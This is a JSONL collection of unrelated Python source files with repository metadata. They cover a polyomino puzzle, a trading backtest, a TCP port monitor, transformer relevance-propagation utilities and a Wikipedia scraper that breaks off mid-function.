updater.dispatcher.add_handler(all_handler)\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"richkhandev/rasm.jpg","sub_path":"Bot_3.py","file_name":"Bot_3.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74058576090","text":"from puzzler.puzzles import polyominoes\nfrom puzzler.puzzles.polyominoes import (\n Polyominoes123456, OneSidedPolyominoes123456)\n\n\nclass Polyominoes123456Star(Polyominoes123456):\n\n \"\"\"\n Monomono, domino, & triominoes restricted to a central 3x3 square.\n\n Pentominoes & tetrominoes restricted to the middle ring, as per\n Polyominoes12345Diamond2.\n\n Hexominoes restricted to an outer ring.\n\n 4,579 unique solutions for the pentominoes & tetrominoes (outer ring).\n 6 unique solutions for the inner square.\n 8 relative orientations.\n Total unique solutions: 219,792.\n\n many solutions\n\n Design by `Jack Wetterer and Chris Patterson, with symmetry refinements by\n Darian Jenkins `__, extending Kadon's\n 'Poly-5' (gamepuzzles.com/polycub2.htm#P5).\n \"\"\"\n\n width = 27\n height = 29\n\n def coordinates(self):\n self.inner_square_coords = set(\n self.coordinates_rectangle(3, 3, offset=(12,13)))\n coords_5 = set(\n list(self.coordinates_diamond(7, offset=(7,8)))\n + list(self.coordinates_rectangle(15, 1, offset=(6, 14)))\n + list(self.coordinates_rectangle(1, 15, offset=(13, 7))))\n self.middle_ring_coords = coords_5 - set(self.inner_square_coords)\n coords_6 = set(\n list(self.coordinates_rectangle(27, 1, offset=(0, 14)))\n + list(self.coordinates_rectangle(1, 29, offset=(13, 0))))\n for i in range(6):\n coords_6.update(set(self.coordinates_rectangle(\n 23 - 4 * i, 3 + 4 * i, offset=(2 * i + 2, 13 - 2 * i))))\n self.outer_ring_coords = coords_6 - coords_5\n return sorted(coords_6)\n\n def customize_piece_data(self):\n self.piece_data['P06'][-1]['rotations'] = None\n self.piece_data['P06'][-1]['flips'] = None\n\n fixed_inner_pieces = True\n\n if fixed_inner_pieces:\n\n restrictions = {\n #name: [(aspect, offset), ...],\n 'O1': [(0, (13, 14))],\n 'I2': [(1, (13, 15))],\n 'I3': [(0, (12, 13))],\n 'V3': [(2, (13, 13))],\n 'I4': [(1, ( 6, 14))],\n 'L4': [(1, (13, 7))],\n 'O4': [(0, (16, 12))],\n 'T4': [(2, (11, 17))],\n 'Z4': [(1, ( 9, 16))],\n 'F': [(5, (11, 9))],\n 'I': [(0, (13, 17))],\n 'L': [(3, (11, 15))],\n 'N': [(6, ( 8, 14))],\n 'P': [(0, (14, 17))],\n 'T': [(0, (18, 13))],\n 'U': [(1, (15, 14))],\n 'V': [(3, (12, 10))],\n 'W': [(3, ( 8, 11))],\n 'X': [(0, (15, 15,))],\n 'Y': [(0, (15, 10))],\n 'Z': [(3, (10, 11))],\n }\n\n def build_matrix(self):\n self.build_restricted_matrix()\n\n else:\n\n def build_matrix(self):\n self.build_regular_matrix(\n (polyominoes.Monomino.piece_data.keys()\n + polyominoes.Domino.piece_data.keys()\n + sorted(polyominoes.Trominoes.piece_data.keys())),\n sorted(self.inner_square_coords))\n self.build_regular_matrix(\n (sorted(polyominoes.Tetrominoes.piece_data.keys())\n + sorted(polyominoes.Pentominoes.piece_data.keys())),\n sorted(self.middle_ring_coords))\n self.build_regular_matrix(\n sorted(polyominoes.Hexominoes.piece_data.keys()),\n sorted(self.outer_ring_coords))\n\n\nclass Polyominoes123456_23x13(Polyominoes123456):\n\n width = 23\n height = 13\n","repo_name":"bpasanek/puzzlecode","sub_path":"puzzler-tweaked/puzzler/puzzles/polyominoes123456.py","file_name":"polyominoes123456.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"40065589768","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\ndef load_data(file_name):\n df = pd.read_csv(file_name)\n return df\n\ndef buy_n_sell(true_prices, pred_prices, balance=1000000):\n\n num_share = 0\n portfolio_values = list()\n\n long_pos = 1 # 1 long ; 0 short\n long_price = true_prices[0] # assume holding the stock at the beginning\n\n profits = list() # daily profit\n\n num_share = balance//long_price\n balance = balance-num_share*long_price\n\n for i in range(len(pred_prices)-1):\n if i == len(pred_prices)-2 and long_pos == 1:\n if pred_prices[i+1] >= true_prices[i]:\n profits.append(true_prices[i+1]-long_price) # sell on last day\n long_pos = 0\n balance = balance + true_prices[i + 1] * num_share\n portfolio_values.append(balance) # 2nd last day\n portfolio_values.append(balance) # last day\n num_share = 0\n break\n else: # i == len(pred_prices)-2 and pred_prices[i+1] < true_prices[i] and long_pos == 1:\n profits.append(true_prices[i]-long_price) # sell on the 2nd last day\n long_pos = 0\n balance = balance + num_share*true_prices[i]\n portfolio_values.append(balance)\n portfolio_values.append(balance)\n num_share = 0\n break\n if high_return(true_prices[i], pred_prices[i+1]) and long_pos == 0:\n long_pos = 1\n profits.append(0)\n long_price = true_prices[i]\n portfolio_values.append(balance)\n num_share = balance//long_price\n balance = balance-num_share*long_price\n elif high_return(true_prices[i], pred_prices[i+1]) != True and long_pos == 1:\n long_pos = 0\n profits.append(true_prices[i]-long_price)\n balance = balance + num_share*true_prices[i]\n num_share = 0\n portfolio_values.append(balance)\n elif low_return(true_prices[i], pred_prices[i+1]) and long_pos == 1:\n long_pos = 0\n balance += num_share*true_prices[i]\n portfolio_values.append(balance)\n num_share=0\n else:\n profits.append(0)\n portfolio_values.append(balance+num_share*true_prices[i])\n continue\n return portfolio_values\n\n\n\ndef high_return(true_price, pred_price):\n return pred_price >= true_price * 1.02 > 0 # if predicted price is 2% higher than current price\n\n\ndef low_return(true_price, pred_price):\n return true_price * 0.99 >= pred_price > 0\n\n\nfile_name = 'return_df.csv'\ndf = load_data(file_name)\n\ntrue_prices, pred_prices = df['true_prices'], df['pred_prices']\nbalance = 1000000\nportfolio_values = buy_n_sell(true_prices, pred_prices,balance)\nportfolio_values = [elem/balance for elem in portfolio_values]\ntrue_pct_change = [x/true_prices[0] for x in true_prices]\n\n# plotting\nplt.plot(true_pct_change, label=\"buy and hold\")\nplt.plot(portfolio_values, label='strategy')\nplt.legend()\nplt.show()\n\ntrue_returns = np.diff(true_prices)\npred_returns = np.diff(pred_prices)\nax= plt.figure()\nplt.plot(true_returns, label='true')\nplt.plot(pred_returns, label='predicted')\nplt.show()","repo_name":"ysong126/previous_repo","sub_path":"Time series LSTM/strategy_backtest.py","file_name":"strategy_backtest.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"13402656694","text":"#Task 9_1\nn=0\nnl=0\nf=0\nwhile n<1 or n>100000:\n n=int(input())\nwhile nl>n or nl<1 or f==1:\n f=0\n print(f\"Vvedite cherz probel {n} chisel.\")\n l=list(map(int,input().split()))\n nl=len(l)\n l.sort()\n if len(l) > 0:\n if l[-1] > 2*10e9 or l[0] < -2*10e9:\n f=1\ntl = set(l)\nprint(len(tl))\n\n##Task 9_2\ntmp1 = set()\ntmp2 = set()\ntmp3 = set()\nprint(f\"Vvedite kol-vo tmp1 <100000.\")\nn=0\nwhile n<1 or n>=100000:\n n=int(input())\nprint(f\"Vvedite tmp1\")\nfor i in range(n):\n tmp1.add(int(input()))\nprint(f\"Vvedite kol-vo tmp2 <100000.\")\nn=0\nwhile n<1 or n>=100000:\n n=int(input())\nprint(f\"Vvedite tmp2\")\nfor i in range(n):\n tmp2.add(int(input()))\ntmp3=tmp2.intersection(tmp1)\nprint(len(tmp3))\n\n##Task 9_3\ntmp=set()\nl=list(map(int,input().split()))\nfor i in l:\n if i in tmp:\n print(f\"{i} YES\")\n else:\n print(f\"{i} NO\")\n tmp.add(i)","repo_name":"IgorKirilyuk/Python1","sub_path":"PythonApplication1/PythonApplication1/lesson_9.py","file_name":"lesson_9.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30077073517","text":"\"\"\"\r\n\n\nWrite a function that returns the most frequent character in a list of words.\n\n### Examples\n\n most_frequent_char([\"apple\", \"bandage\", \"yodel\", \"make\"])\n ➞ [\"a\", \"e\"]\n \n most_frequent_char([\"music\", \"madness\", \"maniac\", \"motion\"])\n ➞ [\"m\"]\n \n most_frequent_char([\"the\", \"hills\", \"are\", \"alive\", \"with\", \"the\", \"sound\", \"of\", \"music\"])\n ➞ [\"e\", \"h\", \"i\"]\n\n### Notes\n\n * If multiple characters tie for most frequent, list all of them in alphabetical order.\n * Words will be in lower case.\n\n\"\"\"\r\n\ndef most_frequent_char(lst):\n x = ''.join(lst)\n y = [x.count(i) for i in x]\n z = []\n for i in range(len(x)):\n if max(y) == y[i]:\n z.append(x[i])\n return sorted(list(set(z)))\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"KcD3bABvuryCfZAYv_10.py","file_name":"KcD3bABvuryCfZAYv_10.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"23429131438","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Yang'\n\nimport socket\nimport time\nimport json\nimport threadpool\n\nhostname=socket.gethostname()\n\nEntry = {\n \"Endpoint\": hostname,\n \"Timestamp\": int(time.time()),\n \"Step\": 60,\n }\n\n#端口超时时间默认设置为5秒\ndef check_tcp_port(kw, timeout=5):\n try:\n cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n address = (str(kw[\"host\"]), int(kw[\"port\"]))\n cs.settimeout(timeout)\n status = cs.connect_ex(address)\n cs.close()\n except Exception as e:\n return {\"status\": False, \"message\": str(e)}\n else:\n if status != 0:\n return {\"status\": False, \"message\": \"Connection %s:%s failed\" % (kw[\"host\"], kw[\"port\"])}\n else:\n return {\"status\": True, \"message\": \"OK\"}\n\ndef run_check(entry_list,host,port,metric_type):\n kw={\"host\": host,\"port\": port}\n status=check_tcp_port(kw=kw)\n if status['status'] == True:\n value=1\n else:\n value=0\n entry = Entry.copy()\n entry.update({\n \"CounterType\": \"GAUGE\",\n \"Metric\": \"tcp.status\",\n \"TAGS\": \"type={0},port={1}\".format(host,port),\n \"Value\": value\n })\n entry_list.append(entry)\n\ndef run_threadpool():\n args=[]\n #线程池预设为8,可以根据机器性能修改\n task_pool=threadpool.ThreadPool(8)\n for service in service_list:\n for host in service['ip']:\n args.append(([entry_list,host,service[\"port\"],service[\"name\"]],None))\n \n theads=threadpool.makeRequests(run_check,args)\n [task_pool.putRequest(req) for req in theads ]\n task_pool.wait()\n \n\nif __name__ == '__main__':\n entry_list = []\n service_list=[]\n #添加服务就按照下面的例子给service_list添加一个dict,\n service_list.append({ \n \"name\": \"zookeeper\" ,\n \"ip\": [\"192.168.1.100\",\"192.168.1.101\",\"192.168.1.102\"],\n \"port\": \"2181\"\n })\n \n service_list.append({\n \"name\": \"rabbitmq\" ,\n \"ip\": [\"192.168.1.103\",\"192.168.1.104\",\"192.168.1.105\"],\n \"port\": \"5672\"\n })\n\n run_threadpool()\n print(json.dumps(entry_list))\n","repo_name":"84372051/n9e_plugin","sub_path":"60_tcp-connect.py","file_name":"60_tcp-connect.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"11677492350","text":"from ..processor import Processor\nfrom ..mfp_app import MFPApp\nfrom ..bang import Uninit\n\n\nclass Plugin(Processor):\n doc_tooltip_obj = \"LADSPA plugin host\"\n\n def __init__(self, init_type, init_args, patch, scope, name):\n initargs, kwargs = patch.parse_args(init_args)\n\n self.lib_name = None\n self.lib_index = None\n self.plug_info = None\n self.plug_name = None\n self.plug_inlets = 0\n self.plug_outlets = 0\n self.plug_control = []\n self.dsp_inlets = []\n self.dsp_outlets = []\n self.inlet_map = {}\n\n if len(initargs):\n self.init_plugin(initargs[0])\n\n Processor.__init__(self, self.plug_inlets, self.plug_outlets, init_type, init_args,\n patch, scope, name)\n self.hot_inlets = list(range(self.plug_inlets))\n\n async def setup(self):\n await self.dsp_init(\n \"ladspa~\",\n lib_name=self.lib_name, lib_index=self.lib_index,\n plug_control=self.plug_control\n )\n\n def init_plugin(self, pname):\n\n pinfo = MFPApp().pluginfo.find(pname)\n self.plug_info = pinfo\n self.lib_name = pinfo.get(\"lib_name\")\n self.lib_index = pinfo.get(\"lib_index\")\n self.plug_name = pinfo.get(\"label\")\n self.plug_inlets = 0\n self.plug_outlets = 0\n self.plug_control = []\n self.inlet_map = {}\n\n self.doc_tooltip_obj = (\n MFPApp().pluginfo.plugin_docstring(pinfo) or self.doc_tooltip_obj)\n self.doc_tooltip_inlet = []\n self.doc_tooltip_outlet = []\n\n portinfo = pinfo.get(\"ports\", [])\n\n for portnum, port in enumerate(portinfo):\n self.plug_control.append(0)\n d = port.get(\"descriptor\", 0)\n if d & MFPApp().pluginfo.LADSPA_PORT_INPUT:\n self.doc_tooltip_inlet.append(MFPApp().pluginfo.port_docstring(port))\n if d & MFPApp().pluginfo.LADSPA_PORT_AUDIO:\n self.dsp_inlets.extend([self.plug_inlets])\n else:\n self.plug_control[portnum] = MFPApp().pluginfo.port_default(port)\n self.inlet_map[self.plug_inlets] = portnum\n self.plug_inlets += 1\n\n elif d & MFPApp().pluginfo.LADSPA_PORT_OUTPUT:\n self.doc_tooltip_outlet.append(MFPApp().pluginfo.port_docstring(port))\n if d & MFPApp().pluginfo.LADSPA_PORT_AUDIO:\n self.dsp_outlets.extend([self.plug_outlets])\n else:\n self.plug_control[portnum] = MFPApp().pluginfo.port_default(port)\n self.plug_outlets += 1\n\n async def trigger(self):\n for portnum, value in enumerate(self.inlets):\n if value is not Uninit:\n self.plug_control[self.inlet_map.get(portnum, 0)] = float(value)\n await self.dsp_setparam(\"plug_control\", self.plug_control)\n\n\ndef register():\n MFPApp().register(\"plugin~\", Plugin)\n","repo_name":"bgribble/mfp","sub_path":"mfp/builtins/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"32"}
+{"seq_id":"22672714018","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom typing import Any, Tuple\nimport torch.autograd as autograd\nfrom torch.nn import ModuleList, ModuleDict\n\n\ndef batch_jacobian(func, input: torch.Tensor):\n assert len(input.size()) == 2\n return torch.stack([autograd.functional.jacobian(func, t) for t in input])\n\n\ndef tuple_jacobian(func, inputs: Tuple[torch.Tensor], batch_dim=0):\n # only support batch_size = 1\n return autograd.functional.jacobian(func, inputs) # out_dims , input_dims\n\n\ndef batch_diag(t: torch.Tensor):\n batch_size, hid_size = t.size()\n diag_t = torch.zeros((batch_size, hid_size, hid_size)).to(t)\n diag_t.as_strided(t.size(), [diag_t.stride(0), diag_t.size(2) + 1,],).copy_(t)\n return diag_t\n\n\ndef batch_diag_value(v: torch.Tensor, m_size):\n assert len(v.size()) == 1\n batch_size = v.size(0)\n # print(v)\n diag_t = torch.zeros((batch_size, m_size, m_size)).to(v)\n diag_t = (diag_t + torch.eye(m_size).to(device=v.device)[None]) * v[:, None, None]\n # index = torch.arange(0,m_size, device=v.device)\n # diag_t[:,index,index] = v\n return diag_t\n\n\nclass LRP:\n \"\"\" Helper class for layerwise relevance propagation \"\"\"\n\n alpha = 1.0\n beta = 0.0\n eps = 1e-10\n use_alpha_beta = True # if False, uses simplified LRP rule: R_i = R_j * z_ji / ( z_j + eps * sign(z_j) )\n consider_attn_constant = (\n False # used by MultiHeadAttn, considers gradient w.r.t q/k zeros\n )\n norm_dim = 1\n\n @classmethod\n def relprop(\n cls,\n function,\n out_relevance,\n inputs: Tuple[torch.Tensor],\n reference_inputs=None,\n reference_output=None,\n jacobians=None,\n batch_dim=0,\n ):\n \"\"\"\n computes input relevance given output_relevance using z+ rule\n works for linear layers, convolutions, poolings, etc.\n notation from DOI:10.1371/journal.pone.0130140, Eq 60\n :param function: forward function\n :param output_relevance: relevance w.r.t. layer output\n :param inps: a list of layer inputs\n :param reference_inputs: \\hat x, default values used to evaluate bias relevance.\n If specified, must be a tuple/list of tensors of the same shape as inps, default = all zeros.\n :param reference_output: optional pre-computed function(*reference_inputs) to speed up computation\n :param jacobians: optional pre-computed jacobians to speed up computation, same as jacobians(function(*inps), inps)\n\n \"\"\"\n assert len(inputs) > 0, \"please provide at least one input\"\n\n alpha, beta, eps = cls.alpha, cls.beta, cls.eps\n\n reference_inputs = reference_inputs or [\n torch.zeros_like(input).to(input) for input in inputs\n ]\n assert len(reference_inputs) == len(inputs)\n\n output = function(*inputs)\n reference_output = (\n reference_output\n if reference_output is not None\n else function(*reference_inputs)\n )\n assert isinstance(output, torch.Tensor) and isinstance(\n reference_output, torch.Tensor\n )\n assert out_relevance.size() == output.size()\n\n flat_out_relevance = out_relevance.view(-1)\n output_size = flat_out_relevance.size(0)\n\n # 1. compute jacobian w.r.t. all inputs\n jacobians = (\n jacobians if jacobians is not None else tuple_jacobian(function, inputs)\n )\n # ^-- list of [*output_dims, *input_dims] for each input\n assert len(jacobians) == len(inputs)\n\n jac_flat_components = [jac.view(output_size, -1) for jac in jacobians]\n # ^-- list of [output_size, input_size] for each input\n flat_jacobian = torch.cat(\n jac_flat_components, dim=-1\n ) # [output_size, combined_input_size]\n\n # 2. multiply jacobian by input to get unnormalized relevances, add bias\n\n flat_input = torch.cat(\n [input.view(-1) for input in inputs], dim=-1\n ) # [combined_input_size]\n flat_reference_input = torch.cat(\n [ref_input.view(-1) for ref_input in reference_inputs], dim=-1\n ) # [combined_input_size]\n batch_size = output.size(batch_dim)\n input_size_per_sample = flat_input.size(0) // batch_size\n flat_bias_impact = reference_output.view(-1) / input_size_per_sample\n\n flat_impact = (\n flat_bias_impact[:, None]\n + flat_jacobian * (flat_input - flat_reference_input)[None, :]\n )\n\n # ^-- [output_size, combined_input_size], aka z_{j<-i}\n\n if cls.use_alpha_beta:\n # 3. normalize positive and negative relevance separately and add them with coefficients\n flat_positive_impact = torch.maximum(\n flat_impact, torch.zeros_like(flat_impact)\n )\n flat_positive_normalizer = (\n torch.sum(flat_positive_impact, dim=cls.norm_dim, keepdim=True) + eps\n )\n flat_positive_relevance = flat_positive_impact / flat_positive_normalizer\n\n flat_negative_impact = torch.minimum(\n flat_impact, torch.zeros_like(flat_impact)\n )\n flat_negative_normalizer = (\n torch.sum(flat_negative_impact, dim=cls.norm_dim, keepdim=True) - eps\n )\n flat_negative_relevance = flat_negative_impact / flat_negative_normalizer\n flat_total_relevance_transition = (\n alpha * flat_positive_relevance + beta * flat_negative_relevance\n )\n else:\n raise NotImplemented()\n # flat_impact_normalizer = tf.reduce_sum(flat_impact, axis=cls.norm_axis, keep_dims=True)\n # flat_impact_normalizer += eps * (1. - 2. * tf.to_float(tf.less(flat_impact_normalizer, 0)))\n # flat_total_relevance_transition = flat_impact / flat_impact_normalizer\n # note: we do not use tf.sign(z) * eps because tf.sign(0) = 0, so zeros will not go away\n\n flat_in_relevance = torch.einsum(\n \"o,oi\", flat_out_relevance, flat_total_relevance_transition\n )\n # ^-- [combined_input_size]\n\n # 5. unpack flat_inp_relevance back into individual tensors\n in_relevances = []\n offset = 0\n for input in inputs:\n input_size = input.view(-1).size(0)\n inp_relevance = flat_in_relevance[offset : offset + input_size].view_as(\n input\n )\n in_relevances.append(inp_relevance)\n offset = offset + input_size\n\n return cls.rescale(out_relevance, in_relevances, batch_dim=batch_dim)\n\n @classmethod\n def rescale(\n cls,\n out_relevance: torch.Tensor,\n in_relevances: Tuple[torch.Tensor],\n batch_dim=None,\n ):\n # assert isinstance(batch_axes, (tuple, list))\n sum_dims = tuple(\n i\n for i in range(len(in_relevances[0].size()))\n if batch_dim is None or i != batch_dim\n )\n ref_scale = out_relevance.abs().sum(\n dim=sum_dims, keepdim=True\n ) # batch_size x 1*\n inp_scales = [\n in_relevance.abs().sum(dim=sum_dims, keepdim=True)\n for in_relevance in in_relevances\n ] # list[batch_size x 1*]\n total_inp_scale = sum(inp_scales) + cls.eps # batch_size x 1*\n in_relevances = [\n in_relevance * (ref_scale / total_inp_scale)\n for in_relevance in in_relevances\n ]\n return in_relevances\n\n\nclass LRPWrapper(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n self.store = {}\n\n def record(self, key, value):\n assert key not in self.store or self.store[key] is None\n self.store[key] = value\n\n def get_record(self, key):\n assert key in self.store and self.store[key] is not False\n if key not in self.store:\n return None\n return self.store[key]\n\n def clear_record(self):\n self.store.clear()\n for key, value in self._modules.items():\n if isinstance(value, LRPWrapper):\n value.clear_record()\n elif isinstance(value, ModuleList):\n for module in value:\n if isinstance(module, LRPWrapper):\n module.clear_record()\n elif isinstance(value, ModuleDict):\n for _, module in value.items():\n if isinstance(module, LRPWrapper):\n module.clear_record()\n\n def relprop(self, out_relevance):\n raise NotImplemented()\n\n\nclass AddWrapper(LRPWrapper):\n def __init__(self) -> None:\n super().__init__()\n\n def forward(self, x, y, record=False):\n if record:\n self.record(\"input1\", x)\n self.record(\"input2\", y)\n return x + y\n\n def relprop(self, out_relevance):\n input1 = self.get_record(\"input1\")\n input2 = self.get_record(\"input2\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n # note: we apply relprop for each independent sample in order to avoid quadratic memory requirements\n flat_input1 = input1.view(-1, input1.size(-1))\n flat_input2 = input2.view(-1, input2.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input1[i, None], flat_input2[i, None]),\n jacobians=[\n torch.eye(flat_input1.size(-1)).to(out_relevance)[None, :, None, :],\n torch.eye(flat_input2.size(-1)).to(out_relevance)[None, :, None, :],\n ],\n )\n for i in range(len(flat_input1))\n ]\n\n flat_in_relevance1 = torch.cat([items[0] for items in flat_in_relevance], dim=0)\n flat_in_relevance2 = torch.cat([items[1] for items in flat_in_relevance], dim=0)\n\n # flat_in_relevance1, flat_in_relevanc2 = LRP.relprop(\n # self, flat_out_relevance, (flat_input1, flat_input2)\n # )\n in_relevance1 = flat_in_relevance1.view_as(input1)\n in_relevance2 = flat_in_relevance2.view_as(input2)\n\n return in_relevance1, in_relevance2\n\n\nclass LinearWrapper(LRPWrapper):\n def __init__(self, linear: torch.nn.Module, activation_fn=None) -> None:\n super().__init__()\n self.weight = linear.weight\n self.bias = linear.bias\n self.activation_fn = activation_fn\n\n def forward(self, x, record=False):\n if record:\n self.record(\"input\", x)\n x = x.matmul(self.weight.t())\n if self.bias is not None:\n x = x + self.bias\n if self.activation_fn is not None:\n x = self.activation_fn(x)\n return x\n\n def relprop(self, out_relevance):\n\n input = self.get_record(\"input\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n # note: we apply relprop for each independent sample in order to avoid quadratic memory requirements\n flat_input = input.view(-1, input.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input[i, None],),\n jacobians=[self.weight[None, :, None, :]],\n )[0]\n for i in range(len(flat_input))\n ]\n flat_in_relevance = torch.cat(flat_in_relevance, dim=0)\n\n # if flat_input.size(0) == 1:\n # flat_in_relevance = LRP.relprop(\n # self,\n # flat_out_relevance,\n # (flat_input,),\n # jacobians=[self.weight[None, :, None, :]],\n # )[0]\n # else:\n # flat_in_relevance = LRP.relprop(self, flat_out_relevance, (flat_input,))[0]\n\n in_relevance = flat_in_relevance.view_as(input)\n\n return in_relevance\n\n\nclass LayerNormWrapper(LRPWrapper):\n \"\"\"\n Performs Layer Normalization\n \"\"\"\n\n def __init__(self, layernorm) -> None:\n super().__init__()\n self.weight = layernorm.weight\n self.bias = layernorm.bias\n self.epsilon = layernorm.eps\n self.normalized_shape = layernorm.normalized_shape\n\n def forward(self, x, record=False):\n if record:\n self.record(\"input\", x)\n\n return F.layer_norm(\n x, self.normalized_shape, self.weight, self.bias, self.epsilon\n )\n\n def _jacobian(self, input):\n assert len(input.size()) == 2, \"Please reshape your inputs to [batch, dim]\"\n batch_size = input.size(0)\n hid_size = input.size(1)\n centered_input = input - torch.mean(input, dim=-1, keepdim=True)\n variance = torch.var(centered_input, dim=-1, unbiased=False, keepdim=True)\n invstd_factor = torch.rsqrt(variance)\n\n # note: the code below will compute jacobian without taking self.scale into account until the _last_ line\n # jac_out_wrt_invstd_factor = centered_input\n jac_out_wrt_variance = -0.5 * (variance + self.epsilon) ** (-1.5)\n\n jac_out_wrt_squared_difference = jac_out_wrt_variance / hid_size\n\n jac_out_wrt_centered_input = (\n batch_diag_value(invstd_factor[:, 0], hid_size)\n + jac_out_wrt_squared_difference[:, :, None]\n * 2\n * centered_input[:, None, :]\n * centered_input[:, :, None]\n )\n\n # jac_out_wrt_input = torch.matmul(\n # jac_out_wrt_centered_input,\n # (\n # torch.eye(hid_size).to(input)\n # - (torch.ones((hid_size, hid_size)).to(input) / hid_size)\n # ),\n # )\n jac_out_wrt_input = torch.matmul(\n jac_out_wrt_centered_input.float(),\n (\n torch.eye(hid_size).to(input)\n - (torch.ones((hid_size, hid_size)).to(input) / hid_size)\n ).float(),\n )\n return jac_out_wrt_input.half() # batch x hid_size x hid_size\n # return jac_out_wrt_input # batch x hid_size x hid_size\n\n def relprop(self, out_relevance):\n \"\"\"\n computes input relevance given output_relevance\n :param output_relevance: relevance w.r.t. layer output, [*dims, out_size]\n notation from DOI:10.1371/journal.pone.0130140, Eq 60\n \"\"\"\n input = self.get_record(\"input\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n flat_input = input.view(-1, input.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n jacobians = self._jacobian(flat_input)\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input[i, None],),\n jacobians=[jacobians[i, None]],\n )[0]\n for i in range(len(flat_input))\n ]\n flat_in_relevance = torch.cat(flat_in_relevance, dim=0)\n\n # flat_in_relevance = LRP.relprop(self, flat_out_relevance, (flat_input,))[0]\n in_relevance = flat_in_relevance.view_as(input)\n\n return in_relevance\n\n\nclass FFNWrapper(LRPWrapper):\n \"\"\"\n Feed-forward layer\n \"\"\"\n\n def __init__(self, linear_in: LinearWrapper, linear_out: LinearWrapper):\n super().__init__()\n self.linear_in = linear_in\n self.linear_out = linear_out\n\n def forward(self, x, record=False):\n x = self.linear_in(x, record=record)\n x = self.linear_out(x, record=record)\n\n def relprop(self, out_relevance):\n mid_relevance = self.linear_out.relprop(out_relevance)\n in_relevance = self.linear_in.relprop(mid_relevance)\n return in_relevance\n\n","repo_name":"DoubleVII/my-fairseq","sub_path":"fairseq/models/transformer_lrp/lrp_utils.py","file_name":"lrp_utils.py","file_ext":"py","file_size_in_byte":15853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9233882995","text":"from ..preProcess import preProcessStr, normalizeStr\nfrom scrapy.exceptions import CloseSpider\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\n\nclass WikiSpiderSpider(CrawlSpider):\n name = \"wiki_spider\"\n allowed_domains = [\"en.wikipedia.org\"]\n\n start_urls = [\n \"https://en.wikipedia.org/wiki/List_of_Marvel_Cinematic_Universe_films\"\n ]\n\n allow_urls = [r\"wiki/\"]\n deny_urls = [\n r\"wiki/Main_Page\",\n r\"wiki/Category:\",\n r\"wiki/Help:\",\n r\"wiki/ISO\",\n r\"wiki/Portal:\",\n r\"wiki/Special:\",\n r\"wiki/Talk:\",\n r\"wiki/Template:\",\n r\"wiki/Template_talk:\",\n r\"wiki/User_talk:\",\n r\"wiki/Wikipedia:\",\n r\"wiki/Wikipedia_talk:\",\n ]\n rules = (\n Rule(\n LinkExtractor(allow=allow_urls, deny=deny_urls),\n callback=\"parse_item\",\n follow=True,\n ),\n )\n\n N = 15000\n count = 0\n\n def parse_item(self, response):\n if self.count >= self.N:\n raise CloseSpider(f\"Scraped {self.N} items. Eject!\")\n\n self.count += 1\n\n data = {}\n data[\"page_url\"] = response.url\n\n data[\"page_title\"] = \"\".join(\n response.xpath(\n '//*[@id=\"firstHeading\"]/descendant-or-self::*/text()'\n ).getall()\n )\n\n maxDescriptionLen = 157\n description = \"\"\n totalP = int(float(response.xpath(\"count(/descendant::p)\").get()))\n numP = 0\n while len(description) < maxDescriptionLen and numP < totalP:\n description += normalizeStr(\n \" \".join(\n response.xpath(\n f\"/descendant::p[{numP}]/descendant-or-self::*/text()\"\n ).getall()\n )\n )\n numP += 1\n\n description = normalizeStr(description).strip()\n data[\"page_description\"] = (\n (description[:maxDescriptionLen] + \"...\")\n if len(description) > maxDescriptionLen\n else description\n )\n\n data[\"page_content\"] = preProcessStr(\n \" \".join(response.xpath(\"//p/descendant-or-self::*/text()\").getall())\n )\n\n headings = {}\n for i in range(2, 7):\n head_val = preProcessStr(\n \" \".join(\n response.xpath(f\"//h{i}/descendant-or-self::*/text()\").getall()\n )\n )\n if head_val:\n headings[f\"h{i}\"] = head_val\n\n data |= headings\n\n info_card = {}\n rows = response.xpath(\n '//*[@id=\"mw-content-text\"]/div[1]/table[contains(@class, \"infobox\")]/tbody/tr'\n )\n for row in rows:\n if row.xpath('./th[@class=\"infobox-above summary\"]'):\n continue\n\n img_box = row.xpath(\n './td[@class=\"infobox-image\"]/a[@class=\"image\"]/img/@src'\n )\n if img_box:\n info_card[\"img_url\"] = img_box.get()\n 